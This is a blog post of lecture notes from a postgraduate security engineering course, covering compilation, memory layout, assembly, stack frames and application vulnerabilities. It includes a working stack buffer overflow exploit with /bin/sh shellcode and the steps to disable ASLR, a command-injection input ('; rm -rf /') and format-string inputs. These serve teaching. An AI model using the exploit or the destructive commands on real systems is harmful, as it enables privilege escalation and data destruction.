This post is more than two years old and may contain outdated information.

Lecture notes on security engineering

December 16, 2019

This post is based on the postgraduate-level course with the same name at King's College London. These notes cover most of the topics, but not as deep, and are primarily intended as a reference for myself.

In this post:


Computer systems #

A computer program is a sequence of bits, and organized as 8-bit bytes, where one byte is 8-bits and each byte represent some text character (ASCII standard). Most programs are developed in a high-level programming language, then compiled, or translated, into an object file, which is executed by a process, and finally terminated.

An object file contains application and libraries, such as program code in binary format, relocation information, which are things that need to be fixed once loaded into memory, symbol information as defined by object or imported, and optional debugging information. Interpreted languages are typically translated into an intermediate format.

Compilation #

The C compilation process includes a preprocessor, compiler, assembler, and linker, which are used in stages to translate some program into a sequence of machine-language instructions packed into an executable object file. The compilation process is often referred to as simply compilation, or compiler.

The compilation process (note that most program code in this post refer to programs written in the C programming language and using gcc to compile):

A linker is used to resolve references to external objects, such as variables and functions (e.g. printf). Static linking is performed at compile-time and dynamic linking is performed at run-time.

An example program in C and assembly:

/* hello.c */
#include <stdio.h>

int main() {
    printf("hello c\n");
    return 0;
}
.section __TEXT
    .globl  _main

_main:
    push    %rbp
    mov     %rsp, %rbp
    sub     $16, %rsp
    mov     $0, -4(%rbp)
    lea     L_.str(%rip), %rdi
    mov     $0, %al
    call    _printf
    xor     %eax, %eax
    add     $16, %rsp
    pop     %rbp
    ret

.section __TEXT
    L_.str: .asciz  "hello c\n"

Tools

Useful tools for working with programs:

Computer organisation #

A modern computer is organized as an assemble of buses, I/O devices, main memory, and processor:

CPU

The CPU has a word size storage device (register) called program counter (PC) that points at some instruction in main memory. Instructions are executed in a strict sequence, which is to read and interpret the instruction as pointed to by program counter, perform operation (as per the instruction), and then update the counter to point to next instruction (note that each instruction has its own unique address).

An operation, as performed by the CPU, use main memory, register file, which is a small storage device with collection of word-size registers, and the arithmetic logic unit (ALU) to compute new data and address values:

Cache memory

A cache memory is memory devices at different levels of accessibility, or sizes, where smaller sizes are faster. The different levels of cache memory is typically used to make programs run faster.

L0 Register CPU register hold words copied from other cache levels
L1 SRAM L1 hold cache lines copied from L2
L2 SRAM L2 hold cache lines copied from L3
L3 SRAM L3 hold cache lines copied from main memory
L4 DRAM Main memory to hold disk blocks from local disks
L5 Local secondary storage Local disks hold files copied from other disks or remote network storage
L6 Remote secondary storage

The different levels of memory is also referred to as memory hierarchy, and is often measured in response time. Each level act as cache memory for the level below, and top-most levels are reserved for information that the processor might need in the near future.

Operating systems #

An operating system provides services to programs. The services are used via abstractions to make it easier to manipulate low-level devices and protect the hardware.

Shell #

A shell provides an interface to the operating system via the command-line (or via library functions):

A shell command is a command-line program and system() is a library function in C to execute shell commands:

For more shell commands, see List of Unix commands.

System calls

A system call is a function executed by the operating system, such as accessing hard drive and creating processes. System calls use shell commands to implement functions and used by programs to request services from the operating system.

In the C programming language, system commands such as write, is wrapped into other functions, such as printf.

Processes #

A process is an abstraction for processor, main memory, or I/O devices, and represent a running program. Its context is the state information the process needs to run.

The processor switches between multiple running programs such as shell and some program using context switching, which saves the state of current process and restores the state of some new process. A thread is multiple execution units within a process with access to the same code and global data.

A kernel is a collection of code and data structures that is always in memory. It is used to manage all processes and called using system call instructions, or syscall, which transfers control to the kernel when the program need some action done by the operating system, such as read or write to file.

Virtual memory #

A virtual memory is an abstraction for main memory and local disks. It provides each program with a virtual address space to make it seem as programs have exclusive use of memory:

Files #

A file is an abstraction for I/O devices and provides a uniform view of devices. Most input and output in a system is reading and writing to files.

File permissions

In UNIX-based systems, each process is assigned real UID/GID (user ID, group ID), which is the user initiating or owning the process, effective UID/GID, or EUID, which is used to determine permissions, and saved UID/GID, or SUID, which is used to drop and gain privileges.

A program with the SUID bit set has the effective UID/GID changed to that of the program owner.

File permissions are set using command, such as -|rwx|r-x|r-x root root <file>:

The kernel will check EUID when the user is trying to write to file (root is most privileged user), and changing EUID with chmod 4755 <file>, which replaces rwx with rws (set-UID), makes the file run with the privileges of the file owner instead of the user.

Address space #

An address space is the range of addresses available to some process.

Below are example locations in buffer for part of C program (address space is based on Linux legacy VM layout where top-most is lower addresses and bottom is higher addresses).

int z;
int w = 10;
int main() {
    int x;
    int y = 42;
    char *p;
    p = malloc(42);
    *p = 42;
}
user space
.text, program code
.bss, uninitialized global data z
.data, initialized global data w
heap, growing from lower to higher addresses malloc(42)
memory mapped region for large chunks of memory, such as shared libraries (text, data, printf) ...
x
y
*p
p (points to address in heap)
stack, growing from higher to lower addresses *p = 42 (write 42 in address in heap)
kernel space

Application-level vulnerabilities #

Application-level vulnerabilities are often due to overprivileged programs, such as mobile applications asking for all permissions, programs are read-write but should be read-only, or caused by unexpected inputs or errors:

A typical local attack exploit vulnerabilities in SUID-root programs to obtain root privileges. A malicious input can be injected at startup via command line, environment, or during execution via dynamic-linked objects and files.

An unintended interaction with environment can result in the creation of new files, accessing restricted files via the file system, or invoking commands and processes. Local attacks often result in memory corruption (control hijacking, data brainwashing), command injection, and information leaks.

A remote attack is more difficult to perform but more powerful as there no need to require prior access to system.

Environment attacks #

An environment attack can occur when applications invoke external commands to carry out tasks, such as using system() to execute some command, popen() to open a process, or execlp() and execvp() to use the PATH environment variable to locate applications.

A PATH substitution attack use commands without a complete path, where attacker modifies the PATH variable to run a script, or the HOME variable to control execution of commands, such as accessing files.

Input argument attacks #

An input argument attack can occur when applications are supplied arguments via some input (command-line, web forms). The user-provided input can be used to inject commands such as ./program "; rm -rf /", which would call program and then delete everything. It is also possible to traverse directories, such as ..-attack, overflow buffer, and perform format string attacks.

To avoid bad inputs:

File access attacks #

A file access attack can occur when applications create or use files, so always check that file exist and that it is not a symbolic link. A race condition such as time-of-check to time-of-use (TOCTTOU) can occur when there is conflicting access to shared data and at least one is write.

// access() check real UID and open() check effective UID

/* real UID */
if (access("file", W_OK) == 0) {
    /* symlink("/etc/passwd", "file"); */

    /* effective UID */
    if((f = open("file", O_WRONLY)) < 0) {
        /* ... */
    }
    /* potentially writing to "/etc/passwd" */
    write(f, buffer, count);
}

Buffer overflow attacks #

A buffer overflow attack can occur when applications try to store more elements in a buffer, which is a set of memory locations, than it can contain. Applications written in Java, Python, and C# are less likely to suffer from buffer overflow attacks as they have built-in overflow detection, but C and C++ do not.

Below is an example program that is vulnerable to a buffer overflow attack, executing this program could result in overflow of buffer_1 into buffer_2.

int main() {
    int i;
    char buffer_2[4];
    char buffer_1[6];

    for(i=0; i < 10; i++) {
        buffer_1[i] = 'A';
    }

    return 0;
}

Assembly #

An assembly language is a low-level symbolic language with processor specific instructions and syntax, such as those developed at AT&T and Intel. Instructions, syntax, data types, registers, and hardware support are typically specified in the instruction set architecture (ISA), which represent an abstract model of some computer implementation.

An assembly program is a sequence of instructions, where each instruction represents an actual operation to be performed by the processor.

In most assembly-like languages, an instruction has the form mnemonic <source>, <destination> (AT&T syntax, or mnemonic <destination>, <source> in Intel syntax) such as mov %eax, %ebx, which is instruction to copy value from %eax to %ebx:

Registers #

A register is a memory location on the CPU and prefixed with %. There are general-purpose registers, which includes stack pointer %esp, frame pointer %ebp, and instruction pointer %eip, and flags registers:

A constant is prefixed with $ and operand size is specified as suffix to mnemonic, where byte is b (8 bit), word is w (16 bit), and long is l (32-bit or 64-bit floating point).

Below is the initial layout and final layout after mov $1, %eax, or copy 1 and set rest to zero (note that %ax is bits 0-15 and %eax is bits 0-31):

%a1 %ah
0 8 16 31
%a1 %ah
10000000 00000000 0 – 0 0 – 0
0 8 16 31

In programs, a memory location is accessed using pointers, which are variables that store memory addresses. Dereferencing a pointer means accessing the value stored at the memory address pointed to by the pointer.

In order to dereference a pointer, the memory address must be computed based on the contents of the base and index registers with an optional constant displacement and scaling factor (determined by architecture and instruction set).

Assembly programming #

Assembly programs are practically always generated by compilers and hand-writing programs using assembly instructions is not very efficient (and can be very error prone).

Below is an assembly program to output hello assembly (note that r* is 64 bit):

; assembly program (64-bit, intel syntax)
section .text
    global _main        ; start point for execution

_main:
    mov rax, 1          ; write (system call)
    mov rdi, 1          ; stdout
    mov rsi, msg        ; address to output
    mov rdx, 14         ; bytes to output
    syscall             ; invoke write
    mov rax, 60         ; exit (system call)
    xor rdi, rdi        ; 0
    syscall             ; invoke exit

section .data
    ; db is raw bytes and line feed \n is 0xah, or 10
    msg db "hello assembly", 10

Data transfer

Data transfer instructions are used to move data between registers, memory, and stack.

; set destination as source
mov <source>, <destination>

; swap destinations
xchg <destination>, <destination>

; store source on top of stack
push <source>

; get destination from top of stack
pop <destination>

Binary arithmetic

Binary arithmetic instriuctions are used to perform arithmetic operations on binary data.

; addition, destination += source
add <source>, <destination>

; subtraction, destination -= source
sub <source>, <destination>

; increment, destination += 1
inc <destination>

; decrement, destination -= 1
dec <destination>

; negation, destination = -destination
neg <destination>

Logical operators

Logical operator instructions are used to perform logical operations on binary data.

; and, destination &= source
and <source>, <destination>

; or, destination |= source
or <source>, <destination>

; exclusive or, destination ^= source
xor <source>, <destination>

; not, destination = ~destination
not <destination>

Unconditional branches

Unconditional branch instructions are used to change the flow of execution.

; jump to address
jmp <address>

; push return address and call function at address
call <address>

; pop return address and return
ret

; call OS-defined handler represented by const
int <const>

Conditional branches

Conditional branch instructions are used to change the flow of execution based on the value of the flags register.

; jump below (unsigned), %eax < %ebx (label is location)
cmp %ebx, %eax
jb <label>

; jump not less (signed), %eax >= %ebx
cmp %ebx, %eax
jnl <label>

; jump zero, %eax = 0
test %eax, %eax
jz <label>

; jump not signed, or not below (signed), %eax >= 0
cmp $0, %eax
jns <label>

Misc instructions

Other common instructions, such as lea and nop.

; load effective address (source must be in memory), destination = &source
lea <source>, <destination>

; do nothing
nop

The stack #

The stack grows towards lower memory addresses. The stack pointer %esp points to top of stack, which is the lowest valid address and last pushed to stack.

The initial layout of stack operation using push and pop.

a 0xbfff8000
b 0xbfff7ffc
c 0xbfff7ff8
d 0xbfff7ff4
%esp e 0xbfff7ff0
0xbfff7fec
0xbfff7fe8

Layout after push f to increment pointer, create space, and store f at address.

a 0xbfff8000
b 0xbfff7ffc
c 0xbfff7ff8
d 0xbfff7ff4
e 0xbfff7ff0
%esp f 0xbfff7fec
0xbfff7fe8

Layout after pop %eax to decrement pointer and store value in %eax (note that f is still at 0xbfff7fec but will be overwritten on next push).

a 0xbfff8000
b 0xbfff7ffc
c 0xbfff7ff8
d 0xbfff7ff4
%esp e 0xbfff7ff0
f 0xbfff7fec
0xbfff7fe8
%eax f

Stack frames #

A stack is composed of frames that are pushed to the stack on function calls. The address to the current frame is stored in frame pointer %ebp.

A frame contains function parameters, which are pushed to stack by caller, return address to jump to at the end, pointer to previous frame (save %ebp to stack and set %ebp = %esp, frame pointer is lowest valid address and part of prologue), and local variables, which are part of the prologue executed by caller (address location is subtracted to move towards lower addresses, typically 4 bytes).

Epilogue

The epilogue is executed by the callee to deallocate local variables, %esp = %ebp, save result in some register, such as %eax, restore frame pointer of caller function, and then resume execution from saved return address.

Example: Function calls and stack layout #

int convert(char *str) {
    int result = atoi(str);
    return result;
}
int main(int argc, char **argv) {
    int sum, i;
    for (i=0; i < argc; i++) {
        sum += convert(argv[i]);
    }
    printf("sum=%d\n", sum);
    return 0;
}

Frame pushed by main caller.

argv 0xbfff8000
argc 0xbfff7ffc
return address (from main) 0xbfff7ff8

Frame pushed by main.

frame pointer (before main) 0xbfff7ff4
sum 0xbfff7ff0
i 0xbfff7fec
str 0xbfff7fe8
return address (from convert to main) 0xbfff7fe4

Frame pushed by convert.

frame pointer (before convert) 0xbfff7fe0
result 0xbfff7fdc
paramater to atoi 0xbfff7fd8

Example: Function calls in assembly #

Below is a function call and its assembly code. The assembly code is generated with Compiler Explorer using x86-64 gcc 4.1.2 and flag -m32 for 32-bit, AT&T syntax).

#include <stdio.h>

void func(int n) {
    printf("argument: %d;\n", n);
}
int main(int argc, char **argv) {
    func(10);
    return 0;
}

Generated assembly instructions for func, leave is same as mov %ebp, %esp followed by pop %ebp, operand size suffix is omitted for clarity.

.LCO
    .string "argument: %d;\n"

func:
    ; void func(int n) {
    push    %ebp
    mov     %esp, %ebp
    sub     $8, %esp
    ; printf("argument: %d;\n", n);
    mov     8(%ebp), %eax
    mov     %eax, 4(%esp)
    mov     $.LCO, (%esp)
    call    printf
    ; }
    leave
    ret

Generated assembly instructions for main.

main:
    ; int main(int argc, char **argv) {
    lea     4(%esp), %ecx
    and     $-16, %esp
    push    -4(%ecx)
    push    %ebp
    mov     %esp, %ebp
    push    %ecx
    sub     $4, %esp
    ; func(10);
    mov     $10, (%esp)
    call    func
    ; return 0;
    mov     $0, %eax
    ; }
    add     $4, %esp
    pop     %ecx
    leave
    lea     -4(%ecx), %esp
    ret

Stack overflow #

A stack overflow, or stack smashing, is a special case of buffer overflow on the stack or heap, where data can overflow allocated buffer and overwrite other memory locations, such as return address.

NOP slide

A NOP slide, or nop-sled, is a sequence of do-nothing instructions used to fill stack and eventually reach a jump to some injected shellcode. Shellcode is any code used to start a shell, such as execve("/bin/sh").

Example: Stack-based buffer overflow attack #

Below is a program vulnerable to a buffer overflow attack using nop-sled and injected shellcode.

/* program.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv) {
    /* buffer of size 512 bytes */
    char buffer[512];
    /* set all bytes in buffer to zero, no leftovers */
    memset(buffer, 0, sizeof(buffer));
    /* copy first argument to buffer without boundary check */
    if (argc > 1) {
        strcpy(buffer, argv[1]);
    }
    /* print content in buffer */
    printf("buffer@%p: %s\n", buffer, buffer);
    return 0;
}

Below is a potential exploit, where shellcode is a hexadecimal string encoding machine instructions. The shellcode can also be written in assembly and inserted into executable by compiler, gcc -o exploit exploit.c shellcode.s with unsigned char code[] = ... ; replaced by extern char shellcode[];.

/* exploit.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PROGRAM "./program"

/* shellcode */
unsigned char shellcode[] =
    "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
    "\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
/* inline macro to get stack pointer */
__inline__ unsigned int get_esp(void) {
    unsigned int res;
    __asm__("movl %%esp, %0" : "=a" (res));
    return res;
}

int main(int argc, char **argv) {
    unsigned int address, i, offset = 0;
    char buffer[768];
    char *n[] = { PROGRAM, buffer, NULL };
    /* offset from base address */
    if (argv[1]) {
        offset = strtol(argv[1], NULL, 10);
    }
    /* address to jump to, stack pointer + offset */
    address = get_esp() + offset;
    fprintf(stderr, "using address %#010x\n", address);
    /* set all bytes in buffer to zero, no leftovers */
    memset(buffer, 0, sizeof(buffer));
    /* fill buffer with addresses, four byte at a time */
    for (i = 0; i < sizeof(buffer); i += 4) {
        *(unsigned int *)(buffer + i) = address;
    }
    /* nop-sled to fill half buffer with nop, 0x90 is hex for na */
    memset(buffer, 0x90, sizeof(buffer)/2);
    /* place shellcode after nop-sled, rest is filled with addresses */
    memcpy(buffer + sizeof(buffer)/2, shellcode, strlen(shellcode));
    /* execute program with buffer as argument */
    execve(n[0], n, NULL);
    perror("execve");
    exit(1);
}

Run exploit with -fno-stack-protector to disable the stack protection (sometimes enabled by default) and echo 0 | sudo tee /proc/sys/kernel/randomize_va_space to disable address space layout randomization (ASLR).

$ CFLAGS="-m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2"
$ cc $CFLAGS -o program program.c
$ cc $CFLAGS -o exploit exploit.c
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
$ ./exploit 1500
using address 0x0xbffffa34
buffer@0xbffff970: ...
bash$

Secure system design #

A system design involves both hardware and software, where software is easy to change, which is good for functionality but bad for security and generally bad for performance, and hardware is hard to change, which is bad for functionality but good for security:

A secure system design favor simplicity, such as fail-safe defaults (key lengths, whitelist better than blacklist) and assume non-expert users, so keep user interface simple and avoid choices.

It is common to reduce the need to trust other parts of the system (kernel is assumed to be trusted) and grant least privileges possible, such as restricting flow of sensitive data, secure compartments (operating system), seccomp system call isolates process by limiting possible interactions.

Layers of security can be used to further secure systems, such as firewall, encrypting data at rest, using type-safe programming languages, and logging relevant operational information.

Tainted flow analysis #

Trusting unvalidated inputs is the root cause of many attacks, such as a program getting unsafe input, or tainted data, from a user and assuming it is safe, or untainted:

Below is an example vulnerable program, where an input such as name="%s%s%s" would crash program and name="...%n..." would write to memory.

char *name = fgets( /* ... */, network_fd);
printf(name); /* vulnerable to format string */

In tainted flow analysis, such as Taint checking, the goal is to prove that no tainted data is used where untainted data is expected for all possible inputs (untainted indicate trusted and tainted indicate untrusted).

Example of program with legal flow:

void f(tainted int);

untainted int a = /* ... */ ;
f(a); /* function expect tainted, and input is untainted, so legal flow */

Example of program with illegal flow:

void f(untainted int);

tainted int a = /* ... */ ;
f(a); /* function assume untainted, and input is tainted, so illegal flow */

Tracking tainted data in programs

Below is an another example of tainted flow analysis on C program at each line of execution (tainted label can be introduced as type or annotation).

void copy(tainted char *src, untainted char *dst, int len) {
    /* tainted: src; untainted: dst; unknown: len */
    untainted int i;
    /* tainted: src; untainted: dst, i; unknown: len */
    for (i = 0; i < len; i++) {
        /* tainted: src; untainted: dst, i; unknown: len */
        dst[i] = src[i]; /* illegal, tainted into untainted */
    }
}

Preventing buffer overflows #

Buffer overflow attacks can sometimes be prevented using programming languages with boundary checking, such as Java or Python, or contained using virtualization. Here are a few other common methods: